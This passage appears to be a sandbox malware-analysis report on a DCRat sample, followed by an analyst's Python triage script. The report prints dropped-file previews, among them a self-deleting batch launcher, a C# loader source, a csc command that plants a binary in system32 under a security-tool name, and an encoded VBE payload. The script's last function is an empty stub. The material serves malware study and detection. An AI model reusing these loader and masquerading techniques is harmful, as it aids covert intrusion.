                                                                                            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Recovery\winlogon.exe, Author: Joe Security
                                                                                            Antivirus:
                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                            • Antivirus: ReversingLabs, Detection: 70%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....C.f................................. ........@.. ....................... ............@.....................................K....... ............................................................................ ............... ..H............text........ ...................... ..`.rsrc... ...........................@..@.reloc..............................@..B........................H.......X...X.......v...................................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................
                                                                                            Process:C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):2041
                                                                                            Entropy (8bit):5.374034001672589
                                                                                            Encrypted:false
                                                                                            SSDEEP:48:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAHKKkrJH1HzHKlT4vHNpv:iq+wmj0qCYqGSI6oPtzHeqKktVTqZ4vb
                                                                                            MD5:553B6EF1B0572462CC8BF3E338B09385
                                                                                            SHA1:11BBCF871361CC815C2261F2A6A4230DC88D5993
                                                                                            SHA-256:58AF346985F4101CBCBB7F2E6269A3E1A5C523B8C121EC7E79F445CB03CDECCE
                                                                                            SHA-512:CA38CEABE6E4425D67B599EADF775A2626A5DCB5B2C956B88349FAB257A98678215C6A9C4E8139799C4FFD7043FF74DC71C0B7556ABB120BCB6589B2023B57CA
                                                                                            Malicious:false
                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S
                                                                                            Process:C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe
                                                                                            File Type:CSV text
                                                                                            Category:dropped
                                                                                            Size (bytes):1281
                                                                                            Entropy (8bit):5.370111951859942
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
                                                                                            MD5:12C61586CD59AA6F2A21DF30501F71BD
                                                                                            SHA1:E6B279DC134544867C868E3FF3C267A06CE340C7
                                                                                            SHA-256:EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
                                                                                            SHA-512:B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
                                                                                            Malicious:false
                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S
                                                                                            Process:C:\Recovery\winlogon.exe
                                                                                            File Type:CSV text
                                                                                            Category:dropped
                                                                                            Size (bytes):1281
                                                                                            Entropy (8bit):5.370111951859942
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
                                                                                            MD5:12C61586CD59AA6F2A21DF30501F71BD
                                                                                            SHA1:E6B279DC134544867C868E3FF3C267A06CE340C7
                                                                                            SHA-256:EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
                                                                                            SHA-512:B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
                                                                                            Malicious:false
                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S
                                                                                            Process:C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe
                                                                                            File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):239
                                                                                            Entropy (8bit):5.1466154973843
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:hCijTg3Nou1SV+DE1wknaZ5s2zQ0BvKOZG1wkn23fp6K4H:HTg9uYDEmrHlDf+
                                                                                            MD5:56E6342EF1E5B571492F299AAA74F702
                                                                                            SHA1:C120A9528AE8737655CE67676F13B5016BB46339
                                                                                            SHA-256:3088FDD4302BEAAF62A08F7066FD87C7959646BBB37B4E342057EE0AD139BBB3
                                                                                            SHA-512:D39DFF21027811EC4CF602E33F4145E85E956E55186A167BAC3E1DBC590891A67C1A3E840B530244A3B1CB991C532C522065BF6A9FF43D8FA903A6EF16E92313
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                            Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\NZDl7DWO67.bat"
                                                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                            File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6fc, 10 symbols, created Fri Mar 29 15:40:51 2024, 1st section name ".debug$S"
                                                                                            Category:dropped
                                                                                            Size (bytes):1972
                                                                                            Entropy (8bit):4.5642720617579435
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:HJe9sIOxfnXUDfH9FwKlNEN8luxOysuZhN7jSjRzPNnqpdt4+lEbNFjMyi0+qUZ:TJXSdmKoKluOulajfqXSfbNtmhlZ
                                                                                            MD5:E27348B241BEE1A27AD73793A59E777A
                                                                                            SHA1:9DF378F4DA5A601F93EEF98D3DB62E20EABDEFE8
                                                                                            SHA-256:4009D70D7AF5BCB908AF99DDF8B1DFC25ED901563CB1AE9C500BF07F7D36B6B1
                                                                                            SHA-512:CCD430935ED2D9161CDE4D1E9EED265578A310E7B89F8E61DAC4F845D607118CE3F9C3C325FD143B65F43783BFA168C797D22BA70B4D35E4C43F95AB3D4C7D65
                                                                                            Malicious:false
                                                                                            Preview:L......f.............debug$S........L...................@..B.rsrc$01................x...........@..@.rsrc$02........p...................@..@........=....c:\Windows\System32\CSCD00016AF5F994D2B979CA07EFAA630F3.TMP.....................r.av..t.y..............4.......C:\Users\user\AppData\Local\Temp\RES41D7.tmp.-.<....................a..Microsoft (R) CVTRES.o.=..cwd.C:\Users\user\AppData\Roaming\msBroker.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe........................ .......8.......................P.......................h.......................................................|...............................................|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.
                                                                                            Process:C:\Users\user\Desktop\H9gMIu2HXi.exe
                                                                                            File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):35
                                                                                            Entropy (8bit):4.286146588249911
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:mKDDFRK58FoXMMH:h08Foc2
                                                                                            MD5:FF59D999BEB970447667695CE3273F75
                                                                                            SHA1:316FA09F467BA90AC34A054DAF2E92E6E2854FF8
                                                                                            SHA-256:065D2B17AD499587DC9DE7EE9ECDA4938B45DA1DF388BC72E6627DFF220F64D2
                                                                                            SHA-512:D5AC72CB065A3CD3CB118A69A2F356314EEED24DCB4880751E1A3683895E66CEDC62607967E29F77A0C27ADF1C9FE0EFD86E804F693F0A63A5B51B0BF0056B5D
                                                                                            Malicious:false
                                                                                            Preview:@echo off..start work.exe -priverdD
                                                                                            Process:C:\Users\user\Desktop\H9gMIu2HXi.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):1481861
                                                                                            Entropy (8bit):7.880225299581498
                                                                                            Encrypted:false
                                                                                            SSDEEP:24576:qubsnafAPyjZrvoW9jdO1T2qdg+GTjMZpCfJYLw289l2zHTJnNXlvWgcDByH0s/F:cI1voojGT0MCfJ3AzHTlvxKyH0st
                                                                                            MD5:E0A16200BD098799073FCB05E9D31300
                                                                                            SHA1:53D0E506AEAA0515595415016FFD0852EAF3161D
                                                                                            SHA-256:951F1F32E96A9C26DE591FE522CB8A1753858EC6C11A2B2D13EFE81131AAC6BD
                                                                                            SHA-512:C705E91A2AE0C68F1F09AD1CBD6818C8B8D5C63DF02BE1831D45CA73D52DBC7A40DB56206EA116022F226EB1F69437ADD5EABFB2986F02041B0CEA109D6597DC
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 14%
                                                                                            • Antivirus: Virustotal, Detection: 20%, Browse
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........w..w..w..<.V.w..<.T..w..<.U.w....Z.w......w......w......w...$.w...4.w..w..v......w......w....X.w......w..Rich.w..........PE..L......d...............!.....................@....@.......................................@.............................4.......P....`..D....................P...#......T............................f..@............@..x...\... ....................text....-.......................... ..`.rdata......@.......2..............@..@.data...PG..........................@....didat.......P......................@....rsrc...D....`......................@..@.reloc...#...P...$..................@..B................................................................................................................................................................................................................................................
                                                                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):1154243
                                                                                            Entropy (8bit):5.996523401858512
                                                                                            Encrypted:false
                                                                                            SSDEEP:24576:2TbBv5rUyXVG5Tn3PB2empJMA+p3iE0nTLhLDN6O:IBJ+Tn3PB2JmA+p3KThDr
                                                                                            MD5:1C051E7154F24C6BEA5788CBE9DCB478
                                                                                            SHA1:041C55D246B3F2A83378CEA458939EEB9FF7AD71
                                                                                            SHA-256:184EF8BDC393FA03BA5C7655425AE8ABFAC071887E45235B129EC74423FA46D6
                                                                                            SHA-512:949927E32CF2AE9E18D4B6D2D52F17EE0432D6502D8000C5AC99D4ECFF8744BB7CFE919F67A06D4D9DEF3776FF4FF0FA048AA01751F3AB5D1C49A6C178D3965E
                                                                                            Malicious:true
                                                                                            Yara Hits:
                                                                                            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe, Author: Joe Security
                                                                                            Antivirus:
                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                            • Antivirus: ReversingLabs, Detection: 65%
                                                                                            • Antivirus: Virustotal, Detection: 58%, Browse
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I.>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I.=>...I..=>..Rich<>..........PE..L..... b............................0........0....@..........................P............@.........................p...4.......P....@....................... ..<#......T............................U..@............0..x....... ....................text............................... ..`.rdata.......0....... ..............@..@.data... G..........................@....didat.......0......................@....rsrc........@......................@..@.reloc..<#... ...$..................@..B................................................................................................................................................................................................................................................
                                                                                            Process:C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe
                                                                                            File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                                                                            Category:dropped
                                                                                            Size (bytes):416
                                                                                            Entropy (8bit):5.095758264663025
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:V/DNVgtDIbSf+eBLZ7bfiFkMSf+eBL6LP7GowiFkD:JNVQIbSfhV7TiFkMSfhWLPySFkD
                                                                                            MD5:F63ABFE30BEBC26A884A9EF49DB85F63
                                                                                            SHA1:41D8D945518B9DD766A9320FF25EEBCD12ACE24C
                                                                                            SHA-256:18A670CB7D65A93BEAA565176EBF52D2C29D985CD83A4690A878192261726A2E
                                                                                            SHA-512:5E05C96CC706690464E300D963005E5EB80326263C02D423C8AD7D6C271F433B6450B4C52AB7F990163A533D153CBA36B576E7898FED353C7B9AF197E5E55010
                                                                                            Malicious:false
                                                                                            Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Windows\system32\SecurityHealthSystray.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Program Files (x86)\msbuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe"); } catch { } }).Start();. }.}.
                                                                                            Process:C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe
                                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):250
                                                                                            Entropy (8bit):5.120629256027318
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:Hu+H2L//1xRT0T79BzxsjGZxWE8owkn23fLZ77:Hu7L//TRq79cQWfF77
                                                                                            MD5:B9433C3BB404F58C4B83A8E985F9E7B7
                                                                                            SHA1:2426F9D2D1E5C8BECABCB8C5A5F13D3D042AD90F
                                                                                            SHA-256:8E8C9E4C61926692312F0EF27B7BCCF1B20F20474937C92B7A26EB94E15A2E57
                                                                                            SHA-512:FF1E518C23FED7E681845A2567D1B291E1044829F0CE276AF029F408CDE2C9244832951C3EF1DC26FC1E2A1FEF40312A6CE79752560793CCEED2F04CD5668D17
                                                                                            Malicious:true
                                                                                            Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\jz2mm1cv\jz2mm1cv.0.cs"
                                                                                            Process:C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe
                                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (346), with CRLF, CR line terminators
                                                                                            Category:modified
                                                                                            Size (bytes):767
                                                                                            Entropy (8bit):5.281824290892456
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:KJrH8oMI/u7L//TRq79cQWfF76KaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:KJoI/un/Vq79tWfcKax5DqBVKVrdFAMb
                                                                                            MD5:916BEEFAE1F31B53CDEE0B51D2162A64
                                                                                            SHA1:BB76DD50C8C54599B5A92130E1517551C8EECC6A
                                                                                            SHA-256:B63E041B00C1339300CB33B325438381AB5F3879CB70CBC65D978746ECBD19A4
                                                                                            SHA-512:D7651CD94CAD754CE6A731928F7FE52E803F6949D6FA31368A1A4CAA9C844294CB030F82741AC809185ACAEF1162A664DB16B6E13872EF46E6C4C0ACE95FFEF1
                                                                                            Malicious:false
                                                                                            Preview:.C:\Users\user\AppData\Roaming\msBroker> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\jz2mm1cv\jz2mm1cv.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                                            Process:C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):25
                                                                                            Entropy (8bit):4.0536606896881855
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:xVvGrIaT4/:Tuy
                                                                                            MD5:25F40F423058EE0AC0505BCAC8A725C3
                                                                                            SHA1:407A5224A6C2F548F26E3B4AABC3037C49371459
                                                                                            SHA-256:BCC0950C9B4C8FF60B654B7644E28DAA69E9746448E7DAFE87D1D8D036325D99
                                                                                            SHA-512:E07606D31C788501BE26BC0AE28B4FCAD5D8D6BE4370054CD006741C0A41BA74261003154BD991756DD884FDB44BDA8E673CFE97E8230ABBF1D8CC7DA0E032C5
                                                                                            Malicious:false
                                                                                            Preview:eqpUpOkLqJimKremTGwLnRiLZ
                                                                                            Process:C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):53
                                                                                            Entropy (8bit):4.958960313012944
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:4RXb0wC11V5wBsK:EXvC11zwBsK
                                                                                            MD5:4E043FFFFDB2B1885FFF43306F36FC76
                                                                                            SHA1:A06CE5B46CB37C5B53F0DF002EFD597FC602299A
                                                                                            SHA-256:7C632992388DF5DC2263B849F18383C1A1059D90DD2BFB816C2D47744A0F1FEB
                                                                                            SHA-512:BB798D246E38A476D9C42D17E10FA509360E5FCCBFD3C20818FCB4AE1E769D9CB84B50C62633003F77603733000DD5E570D355A9D3394BB40361C54BB07792AB
                                                                                            Malicious:false
                                                                                            Preview:oD6PT08EWvxcyJ0rsMHMHGheP2DxtpGmr9BfyeXCadxkojoo7pDDE
                                                                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):89
                                                                                            Entropy (8bit):5.028900217814621
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:lvjHaI82Y76Bhcs0J4A+Q0dAHAxy:lvj5Y7egJYQ0pU
                                                                                            MD5:9BCDE4CA07A1952CA814C0667664D681
                                                                                            SHA1:5AC886D95FF5ECE7B49C3B6F064BC33AFE4EADBF
                                                                                            SHA-256:590CF9245C860D725EB2716D2F12E8EE2585BFE8D03DF2BD1CAE8622A11CD402
                                                                                            SHA-512:ED27D239D148F0BFDC8047EB7BB8C088AD5D252A1595D23FC459F30D7C7698EC05F15F34769E1EE270773733B2CA35E421B99FF7DDF799E7E8876DBBBFE02ADA
                                                                                            Malicious:false
                                                                                            Preview:%SLJznYshrpgXUrd%%pBqQ%..%sqROZRstwQEVk%"%AppData%\msBroker/SurrogatewebSession.exe"%xVH%
                                                                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):832512
                                                                                            Entropy (8bit):5.473650729139317
                                                                                            Encrypted:false
                                                                                            SSDEEP:12288:v5Tnns8tsXmTP/4u46B2emHJJMA+ppW3Ari4VVyZC0+1cp9LhCgEwBvbvHlJNZ6:v5Tn3PB2empJMA+p3iE0nTLhLDN6
                                                                                            MD5:1F994BA149832A45EBEDCE2D36A2CA21
                                                                                            SHA1:AB913617DE27A1079E7E0B6F871C78801C4CAFF9
                                                                                            SHA-256:C0664856C2E59F8CC9E0FF378FED29E6592F429819999E1A44EADE9DBC62187E
                                                                                            SHA-512:683CEF1209118F7AD304B5118DCA5F123F1EA5BB1EE3923C9EF42DECAC8E9ACF9536E6E9B583A04EBCB9E9AD304A948612E0E64CE533F006E0CE61F40F1E7DA3
                                                                                            Malicious:true
                                                                                            Yara Hits:
                                                                                            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe, Author: Joe Security
                                                                                            Antivirus:
                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                            • Antivirus: ReversingLabs, Detection: 70%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....C.f................................. ........@.. ....................... ............@.....................................K....... ............................................................................ ............... ..H............text........ ...................... ..`.rsrc... ...........................@..@.reloc..............................@..B........................H.......X...X.......v...................................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................
                                                                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):223
                                                                                            Entropy (8bit):5.872095737203739
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:GXkgwqK+NkLzWbHZEG8nZNDd3RL1wQJRZ7vtSwKL3JNj:GXkBMCzWL6G4d3XBJr7vtcj
                                                                                            MD5:FBE6F760CA876D530840FBF855628A92
                                                                                            SHA1:9C7FAAA6A666703B0D5A241106CBE42E84683142
                                                                                            SHA-256:8D717BCD2FACA0E8D2765DB69DD401D363BBD3BE007313BF3A107FBC2FB3C8E6
                                                                                            SHA-512:1B6564F56D53017741009BB809CAD3364A29A67F55E5E03473728D4DE9F42F1F0C9DF7AC130D5D27B0B2088A2B64501A6680F3358CE029108B0661A0DD444A43
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                            Preview:#@~^xgAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2v&T!Zb@#@&j.Y,./4?4nV^PxP;DnCD+r(%+1Y`r.jmMkaY ?4n^VE#@#@&.ktj4.VV ]!x~Ju)aw9mYm]zs/~.W0+.zJ sPlSCyuW6HZ8C/nTyjDdS%0w/q9_4R(lOEBP!S~6ls/.Iz4AAA==^#~@.
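The dropped files listed above fit together as one chain: a batch launcher that stalls with w32tm, starts the DCRat binary from AppData and deletes itself; a csc.exe command line that compiles a throwaway C# loader from %TEMP% straight into C:\Windows\system32\SecurityHealthSystray.exe; a batch file padded with undefined %VARIABLE% placeholders; and a Windows Script Encoder (.vbe) payload whose header carries the length of its encoded body. The script below is an added example, not part of the Joe Sandbox report or any Joe Security tooling. It transcribes the Preview fields above (the sandbox prints each line terminator as a ".", turned back into line breaks here), assigns them labels of its own choosing, and runs the checks a triage analyst would want against them; the SYSTEM_BINARIES table, the C:\Windows\System32\winlogon.exe negative control and the hypothetical function names are assumptions of the example. The .vbe header decodes to 198 encoded bytes, which squares with the 223-byte file once the 12-byte header, the checksum trailer of the same length and a trailing line terminator are counted.

```python
import base64
import re
import struct
from pathlib import PureWindowsPath

# Contents transcribed from the Preview fields of the report above. The keys
# are labels chosen for this example, not file names from the report.
RECORDS = {
    "launcher.bat": (
        '@echo off\nchcp 65001\n'
        'w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul\n'
        'start "" "C:\\Users\\user\\AppData\\Roaming\\msBroker\\SurrogatewebSession.exe"\n'
        'del /a /q /f "C:\\Users\\user\\AppData\\Local\\Temp\\\\NZDl7DWO67.bat"'),
    "csc.cmdline": (
        '/t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" '
        '/out:"C:\\Windows\\system32\\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ '
        '/target:winexe /unsafe "C:\\Users\\user\\AppData\\Local\\Temp\\jz2mm1cv\\jz2mm1cv.0.cs"'),
    "padded.bat": (
        '%SLJznYshrpgXUrd%%pBqQ%\n'
        '%sqROZRstwQEVk%"%AppData%\\msBroker/SurrogatewebSession.exe"%xVH%'),
    # Header and trailer of the encoded script; the body is elided ("...")
    # because the preview replaces non-printable bytes.
    "encoded.vbe": '#@~^xgAAAA==...^#~@',
}

SLEEP_SUBSTITUTES = (r"\bw32tm\s+/stripchart\b", r"\bping\b.*\s-n\s+\d+", r"\btimeout\s+/t\b")
COMMON_VARS = {"appdata", "localappdata", "temp", "tmp", "userprofile", "programdata",
               "systemroot", "windir", "public", "programfiles", "programfiles(x86)", "comspec"}


def triage_batch(text):
    """Return the launcher and obfuscation traits found in a batch file."""
    findings = []
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    if any(re.search(p, ln, re.I) for p in SLEEP_SUBSTITUTES for ln in lines):
        findings.append("sleep substitute (w32tm/ping/timeout)")
    if any(re.match(r"start\b", ln, re.I) and "\\appdata\\" in ln.lower() for ln in lines):
        findings.append("starts an executable from AppData")
    if any(re.match(r'del\b.*\.bat"?$', ln, re.I) for ln in lines):
        findings.append("deletes a batch file (self-removal)")
    # Placeholders for variables no host defines expand to nothing, so the
    # command runs unchanged while the file's bytes never match a plain string.
    unknown = {v for v in re.findall(r"%([A-Za-z_][A-Za-z0-9_]*)%", text)
               if v.lower() not in COMMON_VARS}
    if len(unknown) >= 3:
        findings.append(f"undefined-variable padding ({len(unknown)} placeholders)")
    return findings


def triage_compiler_cmdline(cmdline):
    """Flag csc/vbc invocations whose output or source lives where it should not."""
    findings = []
    m = re.search(r'/out:"?([^"\s]+)', cmdline, re.I)
    if m:
        parts = [p.lower() for p in PureWindowsPath(m.group(1)).parts]
        if "windows" in parts or any(p.startswith("program files") for p in parts):
            findings.append(f"compiler output under a system directory: {m.group(1)}")
    for src in re.findall(r'"([^"]+\.(?:cs|vb))"', cmdline, re.I):
        if "\\temp\\" in src.lower() or "\\appdata\\" in src.lower():
            findings.append(f"source compiled from a temporary location: {src}")
    return findings


# Where Windows installs these binaries (assumed table); a copy elsewhere or a
# doubled extension is a lookalike.
SYSTEM_BINARIES = {
    "winlogon.exe": "c:\\windows\\system32",
    "securityhealthsystray.exe": "c:\\windows\\system32",
}


def masquerade_check(path):
    """Return a reason string if `path` mimics a Windows system binary, else None."""
    p = PureWindowsPath(path)
    name = p.name.lower()
    if name.count(".exe") > 1:
        return f"double extension: {p.name}"
    expected = SYSTEM_BINARIES.get(name)
    if expected and str(p.parent).lower() != expected:
        return f"{p.name} outside {expected}: {p.parent}"
    return None


def script_encoder_body_length(text):
    """For Windows Script Encoder output (#@~^...^#~@) return the body length
    stored little-endian in the header; None if the markers are absent."""
    if not (text.startswith("#@~^") and text.rstrip().endswith("^#~@")):
        return None
    return struct.unpack("<I", base64.b64decode(text[4:12]))[0]


def triage(records):
    """Apply every check to the records; returns {label: [findings]}."""
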